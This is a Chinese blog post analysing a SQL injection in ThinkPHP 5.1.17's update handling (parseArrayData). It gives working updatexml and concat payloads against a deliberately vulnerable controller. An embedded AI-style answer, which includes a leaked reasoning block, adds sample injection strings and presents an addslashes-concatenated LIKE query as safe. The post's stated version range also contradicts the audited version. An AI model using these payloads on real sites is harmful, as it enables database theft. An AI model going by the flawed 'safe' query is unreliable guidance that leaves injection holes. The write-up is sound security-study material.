Thinkphp 5.1.17 SQL注入

最新推荐文章于 2024-08-12 00:16:51 发布
原创 最新推荐文章于 2024-08-12 00:16:51 发布 · 1.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #thinkphp #sql注入 #web安全

前言

之前审计的是5.0.15的parseData函数漏洞导致的SQL注入。这次审的是5.1.17的parseArrayData函数漏洞导致的SQL注入。影响版本:
5.1.6<=ThinkPHP<=5.1.7 (非最新的 5.1.8 版本也可利用)。

composer create-project  topthink/think=5.1.17 thinkphp5.1.17

然后改一下composer.json,再composer update就好了。
在这里插入图片描述
然后设置一下database.php:
在这里插入图片描述

index控制器里面写update:

public function index()
{
    $username = request()->get('username');//以数组的格式获取$_GET中的username变量,然后作为参数传入insert()
    db('users')->where(['id' => 15])->update(['username' => $username]);
    return 'Update success';
}

分析

这次是update注入。还是老套路,先把/a给去掉,正常的走一遍update,看看thinkphp是怎么处理的。

?username=111

先跟进一下where()方法:
在这里插入图片描述
$param先获得一个数组作为元素,即['id'=>15],然后再把它弹出去,没什么用。
跟进parseWhereExp()方法,在这里return:
在这里插入图片描述
主要就是对$this->options['where']进行了处理:
在这里插入图片描述
再跟进update方法:
在这里插入图片描述
parseOptions主要就是影响options,产生很多无用的键,增加了'table'=>'users'这个键。然后把这个数组给$this->options['data']
在这里插入图片描述
再跟进$this->connection->update()方法,在这里产生SQL语句:
在这里插入图片描述
再跟进一下这个$this->builder->update()方法,看一下SQL语句的产生:

/**
 * 生成update SQL
 * @access public
 * @param  Query     $query  查询对象
 * @return string
 */
public function update(Query $query)
{
    $options = $query->getOptions();

    $table = $this->parseTable($query, $options['table']);
    $data  = $this->parseData($query, $options['data']);

    if (empty($data)) {
        return '';
    }

    foreach ($data as $key => $val) {
        $set[] = $key . ' = ' . $val;
    }

    'UPDATE %TABLE% SET %SET%%JOIN%%WHERE%%ORDER%%LIMIT% %LOCK%%COMMENT%';
    return str_replace(
        ['%TABLE%', '%SET%', '%JOIN%', '%WHERE%', '%ORDER%', '%LIMIT%', '%LOCK%', '%COMMENT%'],
        [
            $this->parseTable($query, $options['table']),
            implode(' , ', $set),
            $this->parseJoin($query, $options['join']),
            $this->parseWhere($query, $options['where']),
            $this->parseOrder($query, $options['order']),
            $this->parseLimit($query, $options['limit']),
            $this->parseLock($query, $options['lock']),
            $this->parseComment($query, $options['comment']),
        ],
        $this->updateSql);
}

先看一眼下面,和之前的insert注入一样都是直接的替换,没看上面的代码逻辑之前先大胆猜测一下,这个SQL注入可能还是因为正常注入用的是预编译,但是对于处理数据的时候出了问题,导致可以直接拼接恶意代码而不是预编译。跟进一下这两行代码:
在这里插入图片描述
parseTable()利用不大,最终产生这个:
在这里插入图片描述
跟进一下parseData:

/**
 * 数据分析
 * @access protected
 * @param  Query     $query     查询对象
 * @param  array     $data      数据
 * @param  array     $fields    字段信息
 * @param  array     $bind      参数绑定
 * @param  string    $suffix    参数绑定后缀
 * @return array
 */
protected function parseData(Query $query, $data = [], $fields = [], $bind = [], $suffix = '')
{
    if (empty($data)) {
        return [];
    }

    $options = $query->getOptions();

    // 获取绑定信息
    if (empty($bind)) {
        $bind = $this->connection->getFieldsBind($options['table']);
    }

    if (empty($fields)) {
        if ('*' == $options['field']) {
            $fields = array_keys($bind);
        } else {
            $fields = $options['field'];
        }
    }

    $result = [];

    foreach ($data as $key => $val) {
        $item = $this->parseKey($query, $key);

        if ($val instanceof Expression) {
            $result[$item] = $val->getValue();
            continue;
        } elseif (!is_scalar($val) && (in_array($key, (array) $query->getOptions('json')) || 'json' == $this->connection->getFieldsType($options['table'], $key))) {
            $val = json_encode($val);
        } elseif (is_object($val) && method_exists($val, '__toString')) {
            // 对象数据写入
            $val = $val->__toString();
        }

        if (false !== strpos($key, '->')) {
            list($key, $name) = explode('->', $key);
            $item             = $this->parseKey($query, $key);
            $result[$item]    = 'json_set(' . $item . ', \'$.' . $name . '\', ' . $this->parseDataBind($query, $key, $val, $bind, $suffix) . ')';
        } elseif (false === strpos($key, '.') && !in_array($key, $fields, true)) {
            if ($options['strict']) {
                throw new Exception('fields not exists:[' . $key . ']');
            }
        } elseif (is_null($val)) {
            $result[$item] = 'NULL';
        } elseif (is_array($val) && !empty($val)) {
            switch ($val[0]) {
                case 'INC':
                    $result[$item] = $item . ' + ' . floatval($val[1]);
                    break;
                case 'DEC':
                    $result[$item] = $item . ' - ' . floatval($val[1]);
                    break;
                default:
                    $value = $this->parseArrayData($query, $val);
                    if ($value) {
                        $result[$item] = $value;
                    }
            }
        } elseif (is_scalar($val)) {
            // 过滤非标量数据
            $result[$item] = $this->parseDataBind($query, $key, $val, $bind, $suffix);
        }
    }

    return $result;
}

和insert的那个函数处理的大致逻辑都差不多,最终会进入的是这个if:
在这里插入图片描述
跟进一下parseDateBind()函数:

/**
 * 数据绑定处理
 * @access protected
 * @param  Query     $query     查询对象
 * @param  string    $key       字段名
 * @param  mixed     $data      数据
 * @param  array     $bind      绑定数据
 * @param  string    $suffix    绑定后缀
 * @return string
 */
protected function parseDataBind(Query $query, $key, $data, $bind = [], $suffix = '')
{
    // 过滤非标量数据
    if (0 === strpos($data, ':') && $query->isBind(substr($data, 1))) {
        return $data;
    }

    $key  = str_replace(['.', '->'], '_', $key);
    $name = 'data__' . $key . $suffix;

    $query->bind($name, $data, isset($bind[$key]) ? $bind[$key] : PDO::PARAM_STR);

    return ':' . $name;
}

逻辑比较简单,就是产生:data_username的预编译。整个parseData产生的data是这样:
在这里插入图片描述
再经过foreach,产生这样的$set数组:
在这里插入图片描述
再经过str_replace(),产生SQL语句:

UPDATE `users`  SET `username` = :data__username  WHERE  `id` = :where_AND_id

再进行执行:
在这里插入图片描述
跟进execute()函数,一样的逻辑了。先prepare(),再进行预编译参数绑定,最后执行。
在这里插入图片描述
在这里插入图片描述
正常的执行整个过程无法SQL注入,还是因为预编译。接下来index控制器改成username/a,再审一下parseData()函数,还是老地方:
在这里插入图片描述
5.1.17这个版本已经修复了之前的insert中的那种sql注入漏洞,username[0]=INC或者username[0]=DEC也无法控制替换的内容。但是这里多了个default。跟进一下这个新的parseArrayDate()方法:

/**
 * 数组数据解析
 * @access protected
 * @param  Query     $query     查询对象
 * @param  array     $data
 * @return mixed
 */
protected function parseArrayData(Query $query, $data)
{
    list($type, $value) = $data;

    switch (strtolower($type)) {
        case 'point':
            $fun   = isset($data[2]) ? $data[2] : 'GeomFromText';
            $point = isset($data[3]) ? $data[3] : 'POINT';
            if (is_array($value)) {
                $value = implode(' ', $value);
            }
            $result = $fun . '(\'' . $point . '(' . $value . ')\')';
            break;
        default:
            $result = false;
    }

    return $result;
}

首先把数组的值赋值给一组变量,另$type是point即可以进入case,即?username[0]=point。最终$result的相当于这样:

$result=$username[2].'(\''.$username[3]. '(' . $username[1] . ')\')';

这个形式非常像这个:

updatexml(1,concat(0x7e,database(),0x7e),1)

可以构造一波:

?username[0]=point&username[1]=0x7e,database(),0x7e),'1&username[2]=updatexml&username[3]=1',concat

相当于构造的SQL语句是这样:

UPDATE `users` SET `username` = updatexml('1',concat(0x7e,database(),0x7e),'1)') WHERE `id` = 15

成功实现报错注入:
在这里插入图片描述
如果可以存在回显的话,也可以考虑二次注入:

?username[0]=point&username[1]=1&username[2]=concat&username[3]=',database(),'

在这里插入图片描述
产生的SQL语句如下:

UPDATE `users` SET `username` = concat('',database(),'(1)') WHERE `id` = 15

修复

这张图是从别的师傅的博客里找的:
在这里插入图片描述
官方是直接把这个default给删除了。不过我去github上并没有找到这个,可能是我找的有问题叭。。。

ThinkPHP5.1.C+CmsEasy-SQL注入
m0_67441173的博客
08-11 1478
用户可控数据未经过滤,传入 Query 类的 max 方法进行聚合查询语句构造,接着调用本类的 aggregate 方法,本次漏洞问题正是发生在该函数底层代码中,所以所有调用该方法的聚合方法均存在 SQL 注入问题,我们看到 aggregate 方法又调用了 Mysql 类的 aggregate 方法,在该方法中,我们可以明显看到程序将用户可控变量 $field 经过 parseKey 方法处理后,与 SQL 语句进行了拼接。Builder类下的select方法:重点看对字段的处理,也就是重点看。
ThinkPHPSQL注入漏洞学习
m0_61858762的博客
08-17 1044
ThinkPHPSQL注入漏洞学习
ThinkPHP5.1.x SQL注入(update方法)
LYJ20010728的博客
08-13 1535
ThinkPHP5 SQL注入(update方法)漏洞概要初始配置 漏洞概要 本次漏洞存在于 Mysql 类的 parseArrayData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生 漏洞影响版本: 5.1.6<=ThinkPHP<=5.1.7 (非最新的 5.1.8 版本也可利用) 初始配置 获取测试环境代码 composer create-project --prefer-dist topthink/think tpd
ThinkPHP5 SQL注入(select方法)
LYJ20010728的博客
08-13 2638
ThinkPHP5 SQL注入(select方法)漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 Mysql 类的 parseWhereItem 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生 漏洞影响版本: ThinkPHP5全版本 初始配置 获取测试环境代码 composer create-project --prefer-dist topthink/think=5.1 tpH3rmesk1t 将 c
ThinkPHPSQL注入问题
hldfight
11-22 7172
ThinkPHP常见SQL注入问题0x00 前言0x01 where()方法 + exp表达式1.1 漏洞代码1.2 漏洞利用1.3 漏洞原理1.4 漏洞修复0x02 数据查询方法参数可控导致可拼接操作符2.1 漏洞代码2.2 漏洞利用2.3 漏洞原理2.4 漏洞修复0x03 where()方法 + bind表达式 + save()方法3.1 漏洞代码3.2 漏洞利用3.3 漏洞原理3.4 漏洞修复0x04 order()方法4.1 漏洞代码4.2 漏洞利用4.3 漏洞原理4.4 漏洞修复0x05 参考文章
ThinkPHP5.0.x SQL注⼊
LYJ20010728的博客
08-09 1403
ThinkPHP5.0.x SQL注⼊初始配置漏洞利用漏洞分析漏洞描述ThinkPHP5.0.x目录结构Payload说明Application\index\controller\Index.php补充代码说明本地代码审计漏洞修复 初始配置 这里利用ThinkPHP5.0.14做示例,戳此进行下载 下载后的源码中,需要对Application\index\controller\Index.php内容进行修改 <?php namespace app\index\controller; use t
thinkphp漏洞之sql注入漏洞-builder处漏洞
banliyaoguai的博客
08-09 793
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露
Ms08067安全实验室
03-02 609
文章来源|MS08067 WEB攻防知识星球本文作者:叫我啊(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组一、漏洞介绍ThinkPHP是一个开源的,快速、简单的面向对象的...
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
但即使是成熟的框架也可能存在安全漏洞,例如文件ThinkPHP/Lib/Core/Model.class.php中的SQL注入漏洞就是一个例子,它发生在ThinkPHP3.1.3及更早的版本中。 SQL注入是一种常见的网络攻击手段,攻击者通过在数据库...
ThinkPHP5.0.10 SQL注入
LYJ20010728的博客
08-13 1058
ThinkPHP5.0.10 SQL注入漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 Mysql 类的 parseWhereItem 方法中,由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句;再一个, Request 类的 filterValue 方法漏过滤 NOT LIKE 关键字,最终导致 SQL注入漏洞的产生 漏洞影响版本: ThinkPHP=5.0.10 初始配置 获取测试环境代码 composer create-project --pref
Thinkphp5.0.17小程序商城整站
05-25
Thinkphp5.0.17小程序商城整站,前后端。环境要求,php5.6+,mysql5+ 在mysql5.7会有点小问题,建议mysql5.6
ThinkPHP3.2.x SQL注入
LYJ20010728的博客
08-03 1648
ThinkPHP3.x SQL注入初始配置数据库配置where注入控制器配置exp注入控制器配置bind注入控制器配置漏洞利用where注入exp注入bind注入漏洞分析where注入exp注入bind注入参考文章 初始配置 这里利用ThinkPHP3.2.3做示例,戳此进行下载 ThinkPHP中的常用方法汇总总结:M方法,D方法,U方法,I方法 数据库配置 数据库相关内容配置,文件位置Application/Home/Conf/config.php <?php return arr
sql注入实战——thinkPHP
Sesessep的博客
08-11 1657
下载thinkPHP文件解压,将framework关键文件放到think-5.0.15中,改名为thinkphp再将think-5.0.15放到WWW文件夹中输入localhost/WWW/think-5.0.15/public/index.php,访问应用入口文件搭建完成。
ThinkPHP5.0.x框架SQL注入
热门推荐
An丶的博客
06-05 1万+
漏洞简述尽管ThinkPHP 5.0.x框架采用了参数化查询方式,来操作数据库,但是在 insert 和 update 方法中,传入的参数可控,且无严格过滤,最终导致本次SQL注入漏洞发生。ThinkPHP基础知识在进行漏洞分析之前,我们需要了解一下ThinkPHP基础知识,这里仅介绍对本次漏洞分析有帮助的部分。ThinkPHP5.0的 目录结构thinkphp 应用部署目录├─applicati...
thinkphp5漏洞sql注入
m0_69656902的博客
08-12 519
查看后我们得知新版本进行了一个安全更新,所以是存在漏洞的,接下来我们就要根据版本更新后的补丁确定漏洞的位置。因为要先进行数据库的连接,在进入到insert中,所以我们退出来就能进入到insert方法中。但我们要看的是Builder,所以我们进入Builder中的insert。因为是parseData在处理数据,所以我们要进入parseData中。查询结果都是使用了拼接的方法,所以可能是在此处出现了问题。向下查看内容找到先前的补丁内容发现缺少内容,确定漏洞在此。查看版本更新后提交的信息,发现其修改的。
学习笔记-ThinkPHP5漏洞分析之SQL注入(四)
人饭子的博客
11-09 1223
ThinkPHP5漏洞分析之SQL注入(四) 本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.215.1.3<=ThinkPHP5<=5.1.25 。 不同版本 payload 需稍作调整: 5.0.0~5...
ThinkPHP5.1.17代码审计【SQL注入
D.MIND 的博客
05-05 727
文章目录简介:环境搭建正常流程走一次不正常流程走一次payload:修复 简介: 在parseArrayData() 中出现可控制的拼接情况,从而导致 SQL注入 漏洞( update 方法注入) 漏洞影响版本: 5.1.6<=ThinkPHP<=5.1.7 (非最新的 5.1.8 版本也可利用)。 环境搭建 利用composer下载5.1.17版本的源码 composer create-project topthink/think=5.1.17 thinkphp5.1.17 到compos
ThinkPHP5漏洞分析之SQL注入(七)
Jeromeyoung
01-06 2148
返回到了$instance变量中,这时控制器这块已经基本上处理完了,think\App实际上就是thinkphp\library\think\App.php这个php文件里的App类(在MVC架构中,某些类也是可以叫做控制器),think是一个命名空间。命名空间的概念百度一下就知道了。相信很多人在不懂原理的情况下,看这一串payload是感觉很nb的一个paylaod(因为它长,需要的参数多),像我本人之前就纳闷这payload中为啥还会有反斜杠,s参数名是啥?接下来就是获取方法,调用反射执行类的方法。
ThinkPHP5漏洞分析之SQL注入(四)
Jeromeyoung
01-06 1015
代码分析,重在一个思考。写代码分析流程,重在记录思考。共勉。
thinkphpsql注入
最新发布
03-14
<think>好的,我现在要处理用户关于ThinkPHP框架中SQL注入漏洞及防御措施的问题。首先,我需要回顾用户提供的引用内容,特别是引用2、3、4、5,这些直接涉及ThinkPHPSQL注入的内容。用户希望了解漏洞的具体情况以及如何防护。 首先,我需要整理ThinkPHP中常见的SQL注入漏洞类型。根据引用2和3,ThinkPHP可能存在查询构造器误用、表达式注入、参数绑定遗漏等问题。比如,使用字符串拼接而非参数绑定容易导致注入,尤其是在exp方法处理用户输入时,如果没有严格过滤,可能引入恶意代码。 接下来是防御措施。根据引用4和5,使用参数绑定和预处理语句是关键,这能有效防止SQL注入。此外,过滤输入、避免直接拼接SQL也很重要。引用2提到及时更新框架版本,修复已知漏洞,这也是防御的重要步骤。 然后,我需要结合用户提供的引用,确保回答中的每个点都有对应的支持。例如,在漏洞部分,每个类型都应引用对应的文献,如引用2、3等。防御措施部分则引用4、5以及框架的最佳实践。 还要注意用户提到的系统级指令,比如数学公式的格式,但这个问题主要涉及代码和文字描述,可能不需要数学公式。但需要确保代码块正确使用反引号,并且结构清晰。同时,生成相关问题,可能涉及ThinkPHP的其他漏洞或具体防护步骤。 最后,检查引用是否正确标注,回答是否符合中文要求,结构是否清晰。需要分点说明漏洞和防御措施,帮助用户逐步理解问题。可能还需要提醒用户注意框架版本更新,参考官方文档等。</think>### ThinkPHP SQL注入漏洞及防御措施 #### 一、ThinkPHP框架中SQL注入漏洞类型 1. **查询构造器误用导致注入** 使用字符串拼接方式构造查询条件时,若未正确过滤用户输入,可能触发漏洞。例如: ```php $username = $_GET['name']; $user = Db::query("SELECT * FROM users WHERE name = '$username'"); ``` 若`$username`包含恶意字符如`' OR 1=1 -- `,将导致SQL语句被篡改[^5][^4]。 2. **表达式注入漏洞(exp方法滥用)** 使用`exp`方法直接处理用户输入时,未严格校验参数可能导致注入: ```php $where['exp'] = "id = ".$_GET['id']; Db::name('user')->where($where)->select(); ``` 攻击者可构造`id=1 OR SLEEP(5)`实现时间盲注[^2][^3]。 3. **参数绑定遗漏** 在复杂查询中若遗漏参数绑定,直接拼接用户输入: ```php $order = input('order'); Db::name('data')->order($order)->select(); ``` 攻击者可通过`order=id ASC,(SELECT 1 FROM (SELECT SLEEP(5))a)`触发注入[^3]。 --- #### 二、防御措施 1. **强制使用参数绑定** 所有SQL语句中的变量必须通过预处理绑定: ```php Db::name('user')->where('name = :name')->bind(['name' => $username])->select(); ``` 此方法通过参数化查询分离代码与数据,彻底杜绝注入。 2. **严格过滤输入数据** - 使用`filter_var()`验证数据类型 - 对字符串类型参数进行转义: ```php $filtered = htmlspecialchars($_GET['param'], ENT_QUOTES); ``` 3. **禁用危险方法** 避免直接使用`execute()`执行原生SQL,若必须使用则严格限制参数格式: ```php Db::execute("UPDATE table SET field=? WHERE id=?", [$value, $id]); ``` 4. **框架安全配置** - 开启`config/database.php`中的`params_bind`参数 - 设置`auto_param_bind=true`自动绑定参数 5. **及时更新框架版本** ThinkPHP 5.0.24+ 修复了`exp`注入漏洞,6.0版本重构了查询构造器[^3]。应保持框架为最新稳定版。 --- #### 三、验证防护效果示例 ```php // 安全查询示例 $id = input('id/d'); // 强制转换为整型 Db::name('user')->where('id', $id)->find(); // 带过滤的复杂查询 $keywords = addslashes(input('keywords')); Db::name('article')->where('title LIKE "%'.$keywords.'%"')->select(); ``` ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值